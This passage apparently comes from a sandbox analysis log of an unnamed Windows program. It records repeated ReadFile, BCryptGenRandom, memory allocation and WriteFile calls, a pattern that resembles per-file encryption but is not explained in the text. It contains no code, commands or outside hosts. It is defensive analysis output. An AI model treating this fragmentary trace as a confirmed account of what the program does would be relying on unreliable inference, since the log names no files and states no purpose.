dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.484] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.485] CloseHandle (hObject=0x2a8) returned 1 [0203.485] free (_Block=0x3df0008) [0203.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.491] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.492] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.492] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.492] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.492] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.492] free (_Block=0x3e305b8) [0203.492] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.492] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.493] free (_Block=0x1fa91d0) [0203.493] free (_Block=0x1fa2ed8) [0203.493] free (_Block=0x1fa90b8) [0203.493] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.493] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.501] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfd, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.501] CloseHandle (hObject=0x2a8) returned 1 [0203.502] free (_Block=0x3df0008) [0203.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.509] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.509] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.509] free (_Block=0x3e305b8) [0203.509] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.509] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.510] free (_Block=0x1fa91d0) [0203.510] free (_Block=0x1fa2ed8) [0203.510] free (_Block=0x1fa90b8) [0203.510] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.510] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.518] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.519] CloseHandle (hObject=0x2a8) returned 1 [0203.519] free (_Block=0x3df0008) [0203.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.525] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.526] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.526] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.526] free (_Block=0x3e305b8) [0203.526] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.526] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.527] free (_Block=0x1fa91d0) [0203.527] free (_Block=0x1fa2ed8) [0203.527] free (_Block=0x1fa90b8) [0203.527] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.527] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.527] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.527] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.536] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.536] CloseHandle (hObject=0x2a8) returned 1 [0203.536] free (_Block=0x3df0008) [0203.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.544] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.544] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.544] free (_Block=0x3e305b8) [0203.544] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.544] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.544] free (_Block=0x1fa91d0) [0203.544] free (_Block=0x1fa2ed8) [0203.544] free (_Block=0x1fa90b8) [0203.544] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.545] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.553] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x164, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.554] CloseHandle (hObject=0x2a8) returned 1 [0203.554] free (_Block=0x3df0008) [0203.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.560] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.560] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.560] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.560] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.560] free (_Block=0x3e305b8) [0203.561] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.561] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.561] free (_Block=0x1fa91d0) [0203.561] free (_Block=0x1fa2ed8) [0203.561] free (_Block=0x1fa90b8) [0203.561] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.561] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.562] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.562] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.570] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.570] CloseHandle (hObject=0x2a8) returned 1 [0203.571] free (_Block=0x3df0008) [0203.571] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.579] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.579] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.579] free (_Block=0x3e305b8) [0203.579] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.579] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.579] free (_Block=0x1fa91d0) [0203.579] free (_Block=0x1fa2ed8) [0203.579] free (_Block=0x1fa90b8) [0203.579] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.579] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.580] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.587] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.588] CloseHandle (hObject=0x2a8) returned 1 [0203.588] free (_Block=0x3df0008) [0203.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.806] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.806] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.806] free (_Block=0x3e305b8) [0203.806] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.806] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.807] free (_Block=0x1fa91d0) [0203.807] free (_Block=0x1fa2ed8) [0203.807] free (_Block=0x1fa90b8) [0203.807] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.827] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.829] CloseHandle (hObject=0x2a8) returned 1 [0203.830] free (_Block=0x3df0008) [0203.830] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.837] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.837] free (_Block=0x3e305b8) [0203.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.837] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.838] free (_Block=0x1fa91d0) [0203.838] free (_Block=0x1fa2ed8) [0203.838] free (_Block=0x1fa90b8) [0203.838] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.838] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.847] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x63, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.847] CloseHandle (hObject=0x2a8) returned 1 [0203.848] free (_Block=0x3df0008) [0203.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.853] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.853] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.853] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.854] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.854] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.854] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.854] free (_Block=0x3e305b8) [0203.854] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.854] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.854] free (_Block=0x1fa91d0) [0203.854] free (_Block=0x1fa2ed8) [0203.854] free (_Block=0x1fa90b8) [0203.855] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, 